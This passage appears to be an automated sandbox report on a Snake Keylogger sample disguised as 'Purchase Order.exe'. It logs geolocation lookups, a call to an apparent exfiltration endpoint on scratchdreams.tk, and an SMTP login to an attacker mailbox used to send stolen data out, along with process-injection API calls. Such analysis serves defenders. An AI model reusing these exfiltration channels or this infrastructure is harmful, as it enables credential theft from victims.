2024-04-04 10:56:19 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:20 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 10:56:20 UTC	722	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78761 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w38MxPy9B5OGTbuI%2BWuJ%2FnQUxlEgyCws%2Fe%2Fo7%2Bm2M2STjvya5wbUAqJEN%2FTqXletzanDa%2BcGXC7cPFB2kMxUueJnm0gtV%2B2RDN3Sl4YFJ8rU9Yd61x%2FbBVAyc%2FwSq8E1Pn%2FXlowo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c5700905036a-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:20 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:21 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-04 10:56:21 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78762 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2A4hXMjkHIqEI7%2BsMwn3k8KlOAdDcEPKAFHYeG6DvuXU9NaJ330odL4WdnZIu00NXTL70VZm3rx2vVIj%2Fi3VLlFttSmfeqSbUtlhVNyIElEStVF%2BqVIDVr4EIBhGi0lKpxs4op4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c5758dbc2888-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:21 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49719	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:22 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 10:56:22 UTC	712	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78763 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRyF%2FnNu7DNRC%2FvciMyuYUbn%2BBoScBQFFyZMVTtZX4AB%2FK1BoFzvJhykrfXhE87HsZjkrEhTOj5vT8A3xkMFkxuY5ewuA8iIyrCNDGcRPdrxVRVi0C%2FfBIpumVx%2Ff0fARUClLRjl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c57b0a8da4c8-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:22 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:22 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-04 10:56:23 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78764 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2vU3BnHP0vJ%2FynMXv0O%2BwzrG46uWcUHCu1vA3pqzQwJVM8uMbKnJhez0yVFi61pJu5NDDAh5CMCpBJQAipoRDlHavfxDQy2L604jvB5XDnatyZ%2BxHljNbfvVZU0giZd72BRPNIs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c5811ecdb3d1-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:23 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:24 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 10:56:24 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78765 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bP6U3ENHhhtNcnF%2Bb6sEL9KF202KohzLQRQI0x69T7RJPebxclF2BYzIlOD5iW%2B7RGrnc1FbosLSaI%2FKGnjpWP0OButql6a8KWTwrzgUd%2BijtlltkGF2o4P5o6Edxgugojcsam9c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c58b89e42589-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:24 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49724	104.21.27.85	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:25 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-04 10:56:57 UTC	741	IN	HTTP/1.1 522 Date: Thu, 04 Apr 2024 10:56:57 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TjQlaV8ZU88w%2FiqTEY9ZPTqkzeqnF3ubBA54ZjJBYg%2BOGd%2FADhsgC8mKxrLJlnwGezUvj6mSNf1wzVKT%2Fs22AWw4obudNr%2BvQgV8t8CakTgGJZi%2FuwKoq2s1xMMwHnGVgsA2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 86f0c5918e1e0335-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:57 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 4, 2024 12:57:03.099890947 CEST	587	49733	208.91.199.224	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 4, 2024 12:57:03.100392103 CEST	49733	587	192.168.2.5	208.91.199.224	EHLO 980108
Apr 4, 2024 12:57:03.296686888 CEST	587	49733	208.91.199.224	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Apr 4, 2024 12:57:03.297786951 CEST	49733	587	192.168.2.5	208.91.199.224	AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
Apr 4, 2024 12:57:03.497982025 CEST	587	49733	208.91.199.224	192.168.2.5	334 UGFzc3dvcmQ6
Apr 4, 2024 12:57:03.701186895 CEST	587	49733	208.91.199.224	192.168.2.5	235 2.7.0 Authentication successful
Apr 4, 2024 12:57:03.701442003 CEST	49733	587	192.168.2.5	208.91.199.224	MAIL FROM:<tslogs@mksiimst.com>
Apr 4, 2024 12:57:03.899720907 CEST	587	49733	208.91.199.224	192.168.2.5	250 2.1.0 Ok
Apr 4, 2024 12:57:03.900135040 CEST	49733	587	192.168.2.5	208.91.199.224	RCPT TO:<tslogs@mksiimst.com>
Apr 4, 2024 12:57:04.112376928 CEST	587	49733	208.91.199.224	192.168.2.5	550 5.4.6 <tslogs@mksiimst.com>: Recipient address rejected: Email Sending Quota Exceeded

Target ID:	0
Start time:	12:56:07
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order.exe"
Imagebase:	0x270000
File size:	546'304 bytes
MD5 hash:	7EB1409FED2A2B740122F997A76F7A94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:56:12
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order.exe"
Imagebase:	0xad0000
File size:	546'304 bytes
MD5 hash:	7EB1409FED2A2B740122F997A76F7A94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4454181362.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.2%
Total number of Nodes:	274
Total number of Limit Nodes:	18

Executed Functions

Function 06C27F98 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce2a8c7ac2572b99545e587ca6dd3c9becf381057580086d0706a77fe8179f7
Instruction ID: e7dcd616725a05ff532a081b1a799a53643b63437634d205ab60825f34b2c486
Opcode Fuzzy Hash: cce2a8c7ac2572b99545e587ca6dd3c9becf381057580086d0706a77fe8179f7
Instruction Fuzzy Hash: F7D1CD70B016218FDBA5EB79C850B6FB7E6AF88700F14446DE546CB391DB34EA05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 06C254F8 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 295f306af412b51aa70e3b8ecdbfe6723bc8feecd08c41e90da0a212c95a77d4
Instruction ID: 0c49d38cfab277a4233198c9ba203c87c8f1708da505ca26cdb7180c0ae7b34d
Opcode Fuzzy Hash: 295f306af412b51aa70e3b8ecdbfe6723bc8feecd08c41e90da0a212c95a77d4
Instruction Fuzzy Hash: B8711B71D4562ACFEB64CF66CC407EAB7B6BF89300F14C1AAD90DA6254EB704A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 06C243ED Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C2462E

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: aeb9ddbdadbeeffae3d9e4df7c21b6742bdcd38fdd337d963c76913f5cb1eaee
Instruction ID: 828e3725a8a385af94fa9a4199ce55dcede718db0a6ae328434e503a9644e88b
Opcode Fuzzy Hash: aeb9ddbdadbeeffae3d9e4df7c21b6742bdcd38fdd337d963c76913f5cb1eaee
Instruction Fuzzy Hash: A2A16D71D0022ACFDB64CF68C841BEDBBF2BF48314F1485A9D849A7250DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06C243F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C2462E

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a877de531c95e7496a566b6648e8fedbbb943a00000b4b3543b6a0ed6c13fca2
Instruction ID: 152a0b232fe3c7fc19fd5b1a9d1967aa44d74f57297d8fc229d6baa2765c8db3
Opcode Fuzzy Hash: a877de531c95e7496a566b6648e8fedbbb943a00000b4b3543b6a0ed6c13fca2
Instruction Fuzzy Hash: B4915C71D0022ACFDB64DF68C881BDEBBF2BF48314F148569E859A7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0094B038 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0094B29E

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e9f4ba9d2ee450d216e904af3011bcca519d3f3cc8cfa412f44d84e4bea9fb8c
Instruction ID: 2eecb89d5954713cc7d482cb8a8f990cb835dcf199e4770d7fcf8095fa6ec612
Opcode Fuzzy Hash: e9f4ba9d2ee450d216e904af3011bcca519d3f3cc8cfa412f44d84e4bea9fb8c
Instruction Fuzzy Hash: DC815770A00B058FD724DF29D454B5ABBF5FF88304F00892EE496D7A50D775E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0094590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009459C9

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 16f59dcb5fb273f6ea0f390d5a757ac590ba0eafb669fdc5073062096f31ad68
Instruction ID: 489264501e4d7529fbb49b1ac5d732d7eb2d44c10eb94e55bca3f4bbcd80dde1
Opcode Fuzzy Hash: 16f59dcb5fb273f6ea0f390d5a757ac590ba0eafb669fdc5073062096f31ad68
Instruction Fuzzy Hash: C941FEB1D00619CFDB24CFA9C984BCDBBB5FF49304F20816AD408AB261DB75694ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 009444B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009459C9

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2889ab78fff2307f0fb0e5b17fa567ace69b05a9443b642e60f0c221af3ef69c
Instruction ID: 5669d8c759eb1be3c3d6e65387eaabc062ea9a45f65b5341c1e649eeb22d3ce8
Opcode Fuzzy Hash: 2889ab78fff2307f0fb0e5b17fa567ace69b05a9443b642e60f0c221af3ef69c
Instruction Fuzzy Hash: D041FEB1D0071DCBDB24DFA9C884B8EBBB5FF49304F60816AD408AB261DB756949CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06C2416A Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C24200

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f3688efc6622b4e52d3e8a243828e44cd5a8d5e38450ae3b4c86d23f4c153522
Instruction ID: 76a1e55d915b334c1d8cc3d6a8a168d049f368bc0efe229769920aeeeb766a36
Opcode Fuzzy Hash: f3688efc6622b4e52d3e8a243828e44cd5a8d5e38450ae3b4c86d23f4c153522
